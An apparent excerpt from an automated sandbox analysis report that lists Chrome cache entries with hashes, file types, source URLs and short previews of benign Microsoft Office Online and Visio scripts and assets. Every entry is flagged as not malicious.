                                                        SHA-512:E4B73DA7EE169BC5ACDFA945D59514421E60507BDC110D1428A9E28BA35F2B92DCCEAB5FCC7FBFC14E5E8556C9E7771170283A52EBE65439718F790BEB32DE07
                                                        Malicious:false
                                                        Reputation:unknown
                                                        URL:https://res-1.cdn.office.net/officeonline/v/s/hA064E449C6470984_App_Scripts/visio.crypto.js
                                                        Preview:function decryptDocData(n,t,i,r,u,f,e){var o=workerCode.toString(),h,s;o=o.substring(o.indexOf("{")+1,o.lastIndexOf("}"));h=new Blob([o],{type:"application/javascript"});s=new Worker(URL.createObjectURL(h));s.onmessage=function(n){var t=JSON.parse(n.data);t.err?e(t.err,null):f(t,null);s.terminate()};s.postMessage(JSON.stringify({operation:"decrypt",encrypted:n,privateKey:t,iv:i,hash:r,ix:u}))}function encryptDocData(n,t,i,r,u){var f=workerCode.toString(),o,e;f=f.substring(f.indexOf("{")+1,f.lastIndexOf("}"));o=new Blob([f],{type:"application/javascript"});e=new Worker(URL.createObjectURL(o));e.onmessage=function(n){var t=JSON.parse(n.data);t.err?u(t.err,null):r(t,null);e.terminate()};e.postMessage(JSON.stringify({operation:"encrypt",text:n,privateKey:t,ix:i}))}function browserSupportCrypto(){try{return window.crypto&&window.crypto.subtle&&window.TextEncoder&&window.Worker&&window.atob}catch(n){return!1}}function workerCode(){function n(n){return btoa(new Uint8Array(n).reduce(function(n

                                                        Chrome Cache Entry: 405

                                                        Download File
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:HTML document, Unicode text, UTF-8 text, with very long lines (17431), with CRLF, LF line terminators
                                                        Category:downloaded
                                                        Size (bytes):363956
                                                        Entropy (8bit):5.6082604211116465
                                                        Encrypted:false
                                                        SSDEEP:
                                                        MD5:F5F2D241D614FEE6E73D612E9F166786
                                                        SHA1:04ACD5267A53BB21CBBD264105B078CF48532E46
                                                        SHA-256:907CDCB18391181EAA456B685B04F1CAB102D9DDD8BC8DC9CFE29E18D7692C79
                                                        SHA-512:ED8247E679C6C24BBC0C341CB6CE0317D97859CA5A31EC7621468DD01719FBB29962586C16BD0A0D0A9F21BC35C5B8BEAFA927043A3F7F200C59CF7A098175FA
                                                        Malicious:false
                                                        Reputation:unknown
                                                        URL:https://euc-visio.officeapps.live.com/v/visioframe.aspx?visioview=ConsumptionView&ui=en-US&rs=en-US&wopisrc=https%3A%2F%2Fdzentec-my.sharepoint.com%2Fpersonal%2Fi_lahmer_entec-dz_com%2F_vti_bin%2Fwopi.ashx%2Ffiles%2F8ce429d6fa5049ec8af9cf02a4b3bf8d&wdenableroaming=1&mscc=0&wdodb=1&hid=C0435FA1-C09C-0000-2D67-D221555211AE.0&uih=sharepointcom&wdlcid=en-US&jsapi=1&jsapiver=v2&corrid=43eeb8c2-a032-17d8-8427-46735f331328&usid=43eeb8c2-a032-17d8-8427-46735f331328&newsession=1&sftc=1&uihit=docaspx&muv=1&cac=1&mtf=1&sfp=1&sdp=1&hch=1&hwfh=1&readonly=1&dchat=1&sc=%7B%22pmo%22%3A%22https%3A%2F%2Fdzentec-my.sharepoint.com%22%2C%22pmshare%22%3Atrue%7D&ctp=LeastProtected&rct=Normal&wdorigin=Sharing.ClientRedirect&pmorigin=https%3A%2F%2Fdzentec-my.sharepoint.com&filesrc=sharepointcom&fastpreview=true
                                                        Preview:<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" lang="en-US"><head><meta http-equiv="X-UA-Compatible" content="IE=10" /><meta HTTP-EQUIV="Content-Type" content="text/html; charset=utf-8" /><meta HTTP-EQUIV="Expires" content="0" /><script type="text/javascript"> var g_firstByte = new Date(); function highResTimeStamp() { if (performance && performance.now) { return performance.now();} return 0;} var g_firstByteHighhResTime = highResTimeStamp(); var g_pageInitStartTimeHighResTime; var g_jsLTHighhResTime = {} ; if (performance && performance.mark) performance.mark("g_firstByte"); var g_cssLT; var g_jsLT; var g_bootScriptsStartTime; var g_bootScriptsEndTime; </script><![if gte IE 8]><style type="text/css"> #load_back{width:100%;height:100%;opacity:1.0;background-color:#fff;position:absolute;z-index:1050;text-align:center;} #load_img{width:100%;height:100%;position:absolute;text-align:center;display:

                                                        Chrome Cache Entry: 407

                                                        Download File
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:JSON data
                                                        Category:dropped
                                                        Size (bytes):3147
                                                        Entropy (8bit):5.873020992273442
                                                        Encrypted:false
                                                        SSDEEP:
                                                        MD5:998039D777E30CF3A5332E59A5DABD82
                                                        SHA1:A7F964E372F7FD372EA0227F69F03F4A674F2E73
                                                        SHA-256:D05935202A4F45417C35583B93E129A58DE28F2AC20EA1AB412674479564D5CA
                                                        SHA-512:F10E9C75ABC57E0D227F894E8C3851CEFDCD7E7B18B6303030EEC641D0156BF02F0D6AC05E7A2D13C4CE5A61931872D6CCE0847102A93464558AECA83EE5089B
                                                        Malicious:false
                                                        Reputation:unknown
                                                        Preview:{"clientVersion":"20241028.8","files":{"owl.js":["owl.5713dd8afbcd714f28fb.js","sha384-w4e2GtnecI7J3LMVXJzsHNxebPy7aT5eorFnGxkjvCAt/pBRt1pbofeK0dzPIAQT"],"owl.slim.js":["owl.slim.b75c2de5eee34f898531.js","sha384-ednudu6TfjFwhkZuYthMr5PPzuHKFfsI5uXcZScO1mAAJix7QvFHYI5jX7b+/LVb"],"owlnest.js":["owlnest.3dbdabff73823ee499b6.js","sha384-cJfzZ5dQxnK32RfWUaF32UHBQWoX41lGjt285R0w1Sn2Wi7Gz9gx+oUTX/R7jiIV"],"authwebworker.js":["authwebworker.1e854ce4990e8cb68c1e.js","sha384-aLLZVqovQQU7Ox3t5eatei8rWrvm5jOvBXcI3CoOeUWGsujvHUYikecoSQJXsnpG"],"sharedauthclient.js":["sharedauthclient.ca7eac8aacb0d3be6a47.js","sha384-TauRxX02R2boClLlNCftPIlDQs8aWrteNZ7popn6c554D9emfGv3Da0CkCC7hj0B"],"sharedauthclientinteractive.js":["sharedauthclientinteractive.7c0a0d1036558c594c04.js","sha384-xZTZ5nteCQaCzNEtt2/KuJZ/TDlkNXqY7cT3qJoejgwp/LDxOz7KNGhiKpspmF7o"],"sharedauthclientmsal.js":["sharedauthclientmsal.1c9494abd5c5706576ca.js","sha384-3yTCn6YHUVuW0GVbPR/nfanmCcHI6JL3VclynRsKIyuO8CgvHe4v+19emSMZeabL"],"sharedaut

                                                        Chrome Cache Entry: 409

                                                        Download File
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:ASCII text, with very long lines (600)
                                                        Category:dropped
                                                        Size (bytes):403161
                                                        Entropy (8bit):5.476747270614738
                                                        Encrypted:false
                                                        SSDEEP:
                                                        MD5:CA9F8C49256221D2ABA39E2CD47110DC
                                                        SHA1:98B99BEA0613891F7829201CA696D4A70932E320
                                                        SHA-256:5434F8B8DEB89279B21A3D591F871E142D065A625BF8EAC3D4C02138878A7FE8
                                                        SHA-512:8B035A41A0E7F892E6E437D2BDB898820D99557D1207FD4EAA9B34680679982FB5DD74C9D4631BA70C00C9C4AD6CCDE1857C6661F43664E1DF701442D37B7A37
                                                        Malicious:false
                                                        Reputation:unknown
                                                        Preview:'use strict';(globalThis.dullscriptWebpackJsonp=globalThis.dullscriptWebpackJsonp||[]).push([[2],{22624:function(ta,Ac,Ia){ta=Ia(95505);var Ya=Ia(86125),Ea=Ia(24372),Ma=Ia(32806),pb=Ia(87974),Mb=Ia(10236),nc=Ia(64627),sb=Ia(60149),Eb=Ia(72452);class pc{constructor(){this.obe="getAddinShortcutsPreference";this.pbe="saveAddinShortcutsPreference";this.qbe="{0}RoamingServiceHandler.ashx?action={1}&{2}";this.R5b=6E4;this.ILa=this.Qy=this.Nt=null}d9b(ka){return String.format(this.qbe,pb.AFrameworkApplication.H.appSettings.RoamingServiceHandlerWebServiceBase||."",ka,pb.AFrameworkApplication.mg)}executeRequest(ka,fa,ab,jd,Fd){Fd=void 0===Fd?null:Fd;if(pb.AFrameworkApplication.H.getBooleanFeatureGate("Microsoft.Office.SharedOnline.WatcAddinShortcutsPreferenceSettingHelper",!1)){const bf=new Eb.a;pc.tZ.Bx(ka).then(()=>{pc.tZ.FG(ka,fa,Fd,null,!1,2,null,ab,jd,!1,null,this.R5b).continueWith(tf=>{bf.setResult(tf.result)})});return bf.task}return pc.tZ.FG(ka,fa,Fd,null,!1,2,null,ab,jd,!1,null,this.R5

                                                        Chrome Cache Entry: 410

                                                        Download File
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:Unicode text, UTF-8 text, with very long lines (65340), with no line terminators
                                                        Category:downloaded
                                                        Size (bytes):1292155
                                                        Entropy (8bit):5.458931797120034
                                                        Encrypted:false
                                                        SSDEEP:
                                                        MD5:D3FFC522076A964CF138B79419CB5E0F
                                                        SHA1:20E25E1871D1D971DEAB9DBB9393AF58FFA5BDC1
                                                        SHA-256:03126163E07AAC06109D5F5AC49B1CFF2BDD2C8EA64663322695C5F1EF45CAD0
                                                        SHA-512:A386BB9018ED7FD3A9B3D706387AA904FF8B53EAAE4BC2511AF601DEA288C5DBD2F967073522AC0C8EEA6AF481737C7CD71EC3CDEDCF2411801C61D160CB2C43
                                                        Malicious:false
                                                        Reputation:unknown
                                                        URL:https://res-1.cdn.office.net/officeonline/v/s/h03126163E07AAC06_App_Scripts/es2020/uiSlice20.min.js
                                                        Preview:(globalThis.visioOnlineChunks=globalThis.visioOnlineChunks||[]).push([[227],{31262:function(e){function t(e,t,o,n){var i,r=null==(i=n)||"number"==typeof i||"boolean"==typeof i?n:o(n),a=t.get(r);return void 0===a&&(a=e.call(this,n),t.set(r,a)),a}function o(e,t,o){var n=Array.prototype.slice.call(arguments,3),i=o(n),r=t.get(i);return void 0===r&&(r=e.apply(this,n),t.set(i,r)),r}function n(e,t,o,n,i){return o.bind(t,e,n,i)}function i(e,i){return n(e,this,1===e.length?t:o,i.cache.create(),i.serializer)}function r(){return JSON.stringify(arguments)}function a(){this.cache=Object.create(null)}a.prototype.has=function(e){return e in this.cache},a.prototype.get=function(e){return this.cache[e]},a.prototype.set=function(e,t){this.cache[e]=t};var s={create:function(){return new a}};e.exports=function(e,t){var o=t&&t.cache?t.cache:s,n=t&&t.serializer?t.serializer:r;return(t&&t.strategy?t.strategy:i)(e,{cache:o,serializer:n})},e.exports.strategies={variadic:function(e,t){return n(e,this,o,t.cache.

                                                        Chrome Cache Entry: 411

                                                        Download File
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:PNG image data, 49 x 48, 8-bit/color RGB, non-interlaced
                                                        Category:dropped
                                                        Size (bytes):61
                                                        Entropy (8bit):4.068159130770306
                                                        Encrypted:false
                                                        SSDEEP:
                                                        MD5:74C735A4D79283A9E1531F1FF4AA07CE
                                                        SHA1:EED35DB48D44056BC431A78EBECB8A189415742D
                                                        SHA-256:EDBE495B2D50ECC4CB2C8D600E4520DF9983E693B3547643BE5C2B31A992D17C
                                                        SHA-512:30674AB2367F45D3639D6785159A741217C10075B2429F3196D4412415043DDA62BA52B34342B0158449C057F6582AFB815B5758A44C8F3B774CEF02B37BDC0E
                                                        Malicious:false
                                                        Reputation:unknown
                                                        Preview:.PNG........IHDR...1...0.....7.......IDAT.....$.....IEND.B`.

                                                        Chrome Cache Entry: 413

                                                        Download File
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:ASCII text, with very long lines (65457)
                                                        Category:downloaded
                                                        Size (bytes):150835
                                                        Entropy (8bit):5.340479688466803
                                                        Encrypted:false
                                                        SSDEEP:
                                                        MD5:70E69973D116AA4A49CF372670F4C49E
                                                        SHA1:EE89EC3E26EDBC9CFA9046D57094D1843EE8367A
                                                        SHA-256:69ADB70CF651E7D964B25EE8C317523E6E33FA00AC346A6DC3EBA057E60FD4C8
                                                        SHA-512:665793ACE6A623D96B05B34BD6CFF7ED5EDD616E58B1908A3776ABC8B33346627F0B6D8EE5524F07658A5F0C7773BEED2D23477B3A68FBF269F12567A77D9F50
                                                        Malicious:false
                                                        Reputation:unknown
                                                        URL:https://res-1.cdn.office.net/files/sp-client/odsp.1ds/odsp.1ds.lib-b61fbada.js
                                                        Preview:/*! For license information please see odsp.1ds.lib-b61fbada.js.LICENSE.txt */."use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([["odsp.1ds.lib"],{"1ds-lib":function(e,t,n){n.r(t),n.d(t,{_InMemoryPropertyStorage:function(){return Sc},_OneDSLogger:function(){return yc},_SanitizerIds:function(){return Qs},_getDefaultScrubberConfig:function(){return hc}});var a={};n.r(a),n.d(a,{optionalDiagnostic:function(){return Us},requiredDiagnostic:function(){return Ts},requiredService:function(){return Fs}});var i=function(e,t){return i=Object.setPrototypeOf||{__proto__:[]}instanceof Array&&function(e,t){e.__proto__=t}||function(e,t){for(var n in t)Object.prototype.hasOwnProperty.call(t,n)&&(e[n]=t[n])},i(e,t)};function r(e,t){if("function"!=typeof t&&null!==t)throw new TypeError("Class extends value "+String(t)+" is not a constructor or null");function n(){this.constructor=e}i(e,t),e.prototype=null===t?Object.create(t):(n.prototype=t.prototype,new n)}var o=function(){retu

                                                        Chrome Cache Entry: 414

                                                        Download File
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:Unicode text, UTF-8 text, with very long lines (11251), with no line terminators
                                                        Category:dropped
                                                        Size (bytes):11259
                                                        Entropy (8bit):5.0273061388630635
                                                        Encrypted:false
                                                        SSDEEP:
                                                        MD5:851972BAD4C49B271B777DC9CE84CF9F
                                                        SHA1:996B05D241EF6974737073A9FA60B94DB660CC05
                                                        SHA-256:69281EAD531686390E61B726B2959D6A6B675722A234E4D7B42C6E2DD145C19B
                                                        SHA-512:BBE98D289759B4F42C01782C2EE9E666FDD24831F7148B02A8C490145D3183A1EA00523C7EC80530232F0E9B9B16F115888CCEE5D4C0D1D3FE614097326C5259
                                                        Malicious:false
                                                        Reputation:unknown
                                                        Preview:var CommentPaneStringsEnum,CommentPaneStringsArray,CommentPaneStrings={EditButtonText:"Edit",ContextMenuEditButtonText:"Edit comment",DeleteButtonText:"Delete",ContextMenuDeleteButtonText:"Delete comment",ResolveThreadButtonText:"Resolve thread",ReopenThreadButtonText:"Reopen",DeleteThreadButtonText:"Delete thread",DeleteTaskButtonText:"Delete task",GoToFirstCommentGhostCardText:"Go to first comment",GoToNextCommentGhostCardText:"See more comments",ReturnToFirstCommentGhostCardText:"Return to first comment",View1MoreReplyExpandButtonText:"View 1 more reply",OneMoreReplyExpandButtonText:"1 more reply",ViewNMoreRepliesExpandButtonText:"View {0} more replies",NMoreRepliesExpandButtonText:"{0} more replies",ReplyBoxPlaceholderText:"@mention or reply",ReplyBoxPlaceholderTextNoMentions:"Reply",EmptyPaneMessage:"There are no comments in this file.",SaveButtonText:"Save",CancelButtonText:"Cancel",NewThreadPlaceholderText:"@mention or comment",NewThreadPlaceholderTextNoMentions:"Start a convers

                                                        Chrome Cache Entry: 415

                                                        Download File
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:ASCII text, with no line terminators
                                                        Category:downloaded
                                                        Size (bytes):32
                                                        Entropy (8bit):4.413909765557392
                                                        Encrypted:false
                                                        SSDEEP:
                                                        MD5:F5AA74916942EF7D7B9E1BA38A870EC9
                                                        SHA1:6DB83F451A20F0F077B27234BAEABC412ADC979C
                                                        SHA-256:1413DE12D2BEEE8C649ED5194DDD4B5C1ACDD97F5FB4DDC9EF350F3A051A3A11
                                                        SHA-512:72EE643383FF5584B626EBE62226548E7A1ED4CC11B0A15F5DF4B8C36D8F2B39A98C06E46C5575CF5C54A584A4A1F1AAC9045F07260F70854F89C348B7179B92
                                                        Malicious:false
                                                        Reputation:unknown
                                                        URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xNDkSEAnE7Tn0iaXzRRIFDQ9hEiISEAlJS7E3oVswARIFDQ9hEiI=?alt=proto
                                                        Preview:CgkKBw0PYRIiGgAKCQoHDQ9hEiIaAA==

                                                        Chrome Cache Entry: 422

                                                        Download File
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:ASCII text, with very long lines (30298)
                                                        Category:dropped
                                                        Size (bytes):105812
                                                        Entropy (8bit):5.391818966916497
                                                        Encrypted:false
                                                        SSDEEP:
                                                        MD5:4EDE79987F52C99D7B570FE77436747E
                                                        SHA1:B9C4251C30ADBAE5F6BD532F37109E82DA414E7C
                                                        SHA-256:715D8C6EC761B3051A58AC9EE1AB704F7C3587F31159C289372A30AE5103F2F2
                                                        SHA-512:582DA4533516084811FC7ED2C03F7E80226C6376C2C10E1334188D8C975B6A84647257E96CEC12CA5FBDCC487555969D39D9151486E54498BF11ACEED45420BF
                                                        Malicious:false
                                                        Reputation:unknown
                                                        Preview:var shellPerformance=window.performance,HighResolutionTimingSupported=!!shellPerformance&&"function"==typeof shellPerformance.mark;HighResolutionTimingSupported&&shellPerformance.mark("shell_otellogging_start"),(self["suiteux_shell_webpackJsonp_suiteux-main"]=self["suiteux_shell_webpackJsonp_suiteux-main"]||[]).push([["otellogging"],{69691:function(n,t,e){var r=e(92855),i=e(41230),o=e(54800),u=e(59177),a=e(68128),c=e(78939),s=e(85788),f=e(69988),l=e(25855),d=function(n){function t(){var e=n.call(this)||this;return e.pluginVersionStringArr=[],(0,i.A)(t,e,(function(n,t){n.logger&&n.logger.queue||(n.logger=new o.wq({loggingLevelConsole:1})),n.initialize=function(e,r,i,s){(0,u.r2)(n,(function(){return"AppInsightsCore.initialize"}),(function(){var u=n.pluginVersionStringArr;if(e){e.endpointUrl||(e.endpointUrl=f.S);var l=e.propertyStorageOverride;!l||l.getProperty&&l.setProperty||(0,a.$8)("Invalid property storage override passed."),e.channels&&(0,a.Iu)(e.channels,(function(n){n&&(0,a.Iu)(n,

                                                        Chrome Cache Entry: 423

                                                        Download File
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:ASCII text, with very long lines (33654)
                                                        Category:dropped
                                                        Size (bytes):33712
                                                        Entropy (8bit):5.312964320999572
                                                        Encrypted:false
                                                        SSDEEP:
                                                        MD5:B6E215C559C24CAFD09273E9BFAFD357
                                                        SHA1:ECCF0B92955DACEAF6FAD3A9DE7C36EB65B341CB
                                                        SHA-256:DAF0C5F563BBD6915BEA269FA160B52176BAE7AA972FFA7F0D9345165A4825F3
                                                        SHA-512:06FDF7EC3F675C5B458F16E206FE8F64624A3046531EA5484C72CA58136D449DF1638B9AE9CD78C0E355A4A05D373E18D89F96743CCAFF5700DECD1BD52620E9
                                                        Malicious:false
                                                        Reputation:unknown
                                                        Preview:!function(e){var t={};function i(s){if(t[s])return t[s].exports;var r=t[s]={i:s,l:!1,exports:{}};return e[s].call(r.exports,r,r.exports,i),r.l=!0,r.exports}i.m=e,i.c=t,i.d=function(e,t,s){i.o(e,t)||Object.defineProperty(e,t,{enumerable:!0,get:s})},i.r=function(e){"undefined"!=typeof Symbol&&Symbol.toStringTag&&Object.defineProperty(e,Symbol.toStringTag,{value:"Module"}),Object.defineProperty(e,"__esModule",{value:!0})},i.t=function(e,t){if(1&t&&(e=i(e)),8&t)return e;if(4&t&&"object"==typeof e&&e&&e.__esModule)return e;var s=Object.create(null);if(i.r(s),Object.defineProperty(s,"default",{enumerable:!0,value:e}),2&t&&"string"!=typeof e)for(var r in e)i.d(s,r,function(t){return e[t]}.bind(null,r));return s},i.n=function(e){var t=e&&e.__esModule?function(){return e.default}:function(){return e};return i.d(t,"a",t),t},i.o=function(e,t){return Object.prototype.hasOwnProperty.call(e,t)},i.p="",i(i.s=0)}([function(e,t,i){"use strict";var s;function r(e){if(!e)return;const t={};return e.forEac

                                                        Chrome Cache Entry: 424

                                                        Download File
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:ASCII text, with very long lines (47992), with no line terminators
                                                        Category:dropped
                                                        Size (bytes):47992
                                                        Entropy (8bit):5.605846858683577
                                                        Encrypted:false
                                                        SSDEEP:
                                                        MD5:CF3402D7483B127DED4069D651EA4A22
                                                        SHA1:BDE186152457CACF9C35477B5BDDA5BCB56B1F45
                                                        SHA-256:EAB5D90A71736F267AF39FDF32CAA8C71673FD06703279B01E0F92B0D7BE0BFC
                                                        SHA-512:9CE42EBC3F672A2AEFC4376F43D38CA9ED9D81AA5B3C1EEF60032BCC98A1C399BE68D71FD1D5F9DE6E98C4CE0B800F6EF1EF5E83D417FBFFA63EEF2408DA55D8
                                                        Malicious:false
                                                        Reputation:unknown
                                                        Preview:!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var h,t,e,r,i,n,f,o,s,c,a,l,d,m,x,b,H,z,A,u,p,_,v,y,g,B,w,k,S,C,D,E,R,M,F,P,W,O,I,U,K,X,L,j,N,T,q,Z,V,G,J,$,Q,Y,tt,et,rt,it,nt,ot,st,ct,at,ht,lt,ft,dt,ut,pt,_t,vt,yt,gt,Bt,wt,kt,St,bt=bt||function(l){var t;if("undefined"!=typeof window&&window.crypto&&(t=window.crypto),!t&&"undefined"!=typeof window&&window.msCrypto&&(t=window.msCrypto),!t&&"undefined"!=typeof global&&global.crypto&&(t=global.crypto),!t&&"function"==typeof require)try{t=require("crypto")}catch(t){}function i(){if(t){if("function"==typeof t.getRandomValues)try{return t.getRandomValues(new Uint32Array(1))[0]}catch(t){}if("function"==typeof t.randomBytes)try{return t.randomBytes(4).readInt32LE()}catch(t){}}throw new Error("Native crypto module could not be used to get secure random number.")}var r=Object.create||function(t){var e;return n.prototype=t,e=new n,n.prototype=null

                                                        Chrome Cache Entry: 425

                                                        Download File
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:JSON data
                                                        Category:downloaded
                                                        Size (bytes):3147
                                                        Entropy (8bit):5.868680032722024
                                                        Encrypted:false
                                                        SSDEEP:
                                                        MD5:16B1D42F6AF9FBE457968098D8CDEC14
                                                        SHA1:748AF5DA758EEF03064A9D44395C30FC33D279AA
                                                        SHA-256:154B0788D8B14845435FFFFE8B7282FD7EE6B6073BE44128F833DABE82FE2167
                                                        SHA-512:0956762B2050C6AB7822A6C8A23619EEADFE709288F3FC8CA9FD3B74D07BE072B12428E2915D9784F8D78752C9C227EC7465F43DDBAFF124B3EAEF609888476D
                                                        Malicious:false
                                                        Reputation:unknown
                                                        URL:https://wise-m.public.cdn.office.net/wise-m/owl/5mttl/production/50/manifest.json
                                                        Preview:{"clientVersion":"20241027.7","files":{"owl.js":["owl.5713dd8afbcd714f28fb.js","sha384-w4e2GtnecI7J3LMVXJzsHNxebPy7aT5eorFnGxkjvCAt/pBRt1pbofeK0dzPIAQT"],"owl.slim.js":["owl.slim.b75c2de5eee34f898531.js","sha384-ednudu6TfjFwhkZuYthMr5PPzuHKFfsI5uXcZScO1mAAJix7QvFHYI5jX7b+/LVb"],"owlnest.js":["owlnest.3dbdabff73823ee499b6.js","sha384-cJfzZ5dQxnK32RfWUaF32UHBQWoX41lGjt285R0w1Sn2Wi7Gz9gx+oUTX/R7jiIV"],"authwebworker.js":["authwebworker.1e854ce4990e8cb68c1e.js","sha384-aLLZVqovQQU7Ox3t5eatei8rWrvm5jOvBXcI3CoOeUWGsujvHUYikecoSQJXsnpG"],"sharedauthclient.js":["sharedauthclient.c9d88e3342de29214412.js","sha384-B675GojWhzlqe9C9hr6Ko3z2VZWlI57Lwwh5cq389rhrU3pdWRawCHMGcUikPVVD"],"sharedauthclientinteractive.js":["sharedauthclientinteractive.32d3f1e452c40a47a25b.js","sha384-PHJiiiV81Bv7Eq76I272JJhfpPiCfGrh/1v8Bq908BY88o85BpQrkp4sfI/y9Qin"],"sharedauthclientmsal.js":["sharedauthclientmsal.015d636d050ba22dc166.js","sha384-fdx1eNp203nFZu9yMUbkWjwlVOnoksxsCRoFbM6sJoc8bilzxU3XnJZrW4HX/oAi"],"sharedaut

                                                        Chrome Cache Entry: 427

                                                        Download File
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:GIF image data, version 89a, 300 x 5
                                                        Category:downloaded
                                                        Size (bytes):19682
                                                        Entropy (8bit):7.76037140300199
                                                        Encrypted:false
                                                        SSDEEP:
                                                        MD5:31A2C91A8B6C9B2F6998D01F88380E4B
                                                        SHA1:5826D59FB15FE4F377F90A75DE7BA3783A1D49A2
                                                        SHA-256:4DC18BFCCCD5CBCD52B3AD7CB9014ED8A73F8E887E0E9237B6CDA583D9637F11
                                                        SHA-512:AD883423C8FE37A8B49B38E0BE6EF33571C4D3DA3C0EDCD672D7B8E5F5EF10E16F783B21A10AEF8716E257A6B3A48C3298D2D7B787A89FE971F805C2333A25B2
                                                        Malicious:false
                                                        Reputation:unknown
                                                        URL:https://res-1.cdn.office.net/wise/owl/delay.gif
                                                        Preview:GIF89a,.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................!..NETSCAPE2.0.....!.......,....,.......!H. &...).pb....Fd..R$..]...B....P.0.BhH..oN<9.b..*<|.YA....:r..1...`:h........$H eB..3..0 ........0.C..(..(P...h.]...p.l.....m......5_=. @...2H.41.@.$.I&HI.G.........C.D

                                                        Chrome Cache Entry: 428

                                                        Download File
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:ASCII text, with very long lines (592)
                                                        Category:dropped
                                                        Size (bytes):342012
                                                        Entropy (8bit):5.64813507100732
                                                        Encrypted:false
                                                        SSDEEP:
                                                        MD5:7A90234972636AC13730A81FAB14F670
                                                        SHA1:9D00A9B98003212EE34CC513E2D06008F539C4D5
                                                        SHA-256:865BE191F9F0FC274CE79E2D64D9077A8076E04F81BA1EEFAE01A9BA9139D284
                                                        SHA-512:9B1353B3A291C63DDE09F145C482149185FA289D01D04C9B4106103698CDEAF37C19DD736F9EF043A931E4C9531A7E2F922EA88A3F22003D202E1BD53215A783
                                                        Malicious:false
                                                        Reputation:unknown
                                                        Preview:/*. Version=16.0.10001.10000 */.'use strict';(globalThis.dullscriptWebpackJsonp=globalThis.dullscriptWebpackJsonp||[]).push([[1],{74375:function(ta,Ac,Ia){function Ya(A){if(!Sf){var B=qb.AFrameworkApplication.H.getStringFeatureGate("Microsoft.Office.SharedOnline.AddinTitleIdMappingOverride","");B=B.trim();if(0==B.length)var W={};else{W={};B=B.split("|");for(const va of B){const [Fa,nb]=va.split(";");W[Fa.toLowerCase()]=nb}}Object.assign({},cp,W);Sf=!0}W=cp;if(A&&A.toLowerCase()in W)return W[A.toLowerCase()]}function Ea(A,B,W){W=.void 0===W?bp.AssetId:W;return aC(function*(){const va=Ya(A);return va?{titleId:va}:new Promise(Fa=>{B.queryAppDetailByIdFromMos(A,W,(nb,Vb)=>{let hc;0===nb&&0<(null==Vb?void 0:null==(hc=Vb.titleId)?void 0:hc.length)?Fa(Vb):(Db.ULS.sendTraceTag(506505233,220,50,`getAddinTitleIdMapping: cannot get titleId from Mos for solutionId ${A}.`),Fa(void 0))})})})}function Ma(A,B){var W=document.getElementById(A);W?B?W.innerHTML=B:W.remove():B&&(W=document.createElement("

                                                        Chrome Cache Entry: 435

                                                        Download File
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:Web Open Font Format, TrueType, length 6784, version 3.30147
                                                        Category:downloaded
                                                        Size (bytes):6784
                                                        Entropy (8bit):7.904750792584749
                                                        Encrypted:false
                                                        SSDEEP:
                                                        MD5:14EC2D31F37BB0F43FD441D11E771D50
                                                        SHA1:48F83A9581A5E37AD1CCD0D4848EFC7FA64C17CF
                                                        SHA-256:43C551EA819A83B1100F566ECF6BD70DB5A019F165D221200AF2DF11C4448627
                                                        SHA-512:51CABEBB52DC3036CC584B0D03F0107AC7170DCC124A756B6CBFF098893506D8DAB4877FEFD71E3C83016262FACC9735F2BD1BF5D0EC4B6097E3013D287F4BA0
                                                        Malicious:false
                                                        Reputation:unknown
                                                        URL:https://res.cdn.office.net/files/fabric-cdn-prod_20240129.001/assets/icons/fabric-icons-a13498cf.woff
                                                        Preview:wOFF..............-<..u.....................OS/2...D...H...`1Fy.cmap.......#.....<.dcvt ....... ...*....fpgm...........Y...gasp................glyf...........,=_..head.......2...6....hhea...........$....hmtx.......N...x....loca...P...v...v.^..maxp........... .`..name...............Rpost........... .Q..prep............x...x.c`a..8.....u..1...4.f...$..........@ ...........>....!$.X.........F..x.c```f.`..F ..x..c..Y.7......V.....y..=....\..s..2....>..n.....s..9..w>_...../.^Lx1...3^l.q...O^.y......._Y..z...7_..|......................6..).h...6.x......&IF....%.$>K...$.Q..{...w$nH<..,qTb.D.D.D.D.D..M...v.6.V.t..q;q[q3qM..b...D.\.n.......<.xX0]`..&.....~..BB.>...~v.V.....x.c.b.e(`h`X.......x............x.]..N.@..s$..'@:!.u*C....K$.%%...J.......n..b.........|.s...|v..G*)V.7........!O.6eaL.yV.e.j..kN..M.h....Lm....-b....p.N.m.v.....U<..#...O.}.K..,V..&...^...L.c.x.....?ug..l9e..Ns.D....D...K........m..A.M....a.....g.P..`....d.............x..Y.tT.....g....2L..$/..I.

                                                        Chrome Cache Entry: 440

                                                        Download File
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:ASCII text, with very long lines (65536), with no line terminators
                                                        Category:downloaded
                                                        Size (bytes):317610
                                                        Entropy (8bit):5.248970087650918
                                                        Encrypted:false
                                                        SSDEEP:
                                                        MD5:61F9D929B95075C6B1480E0EDF92F311
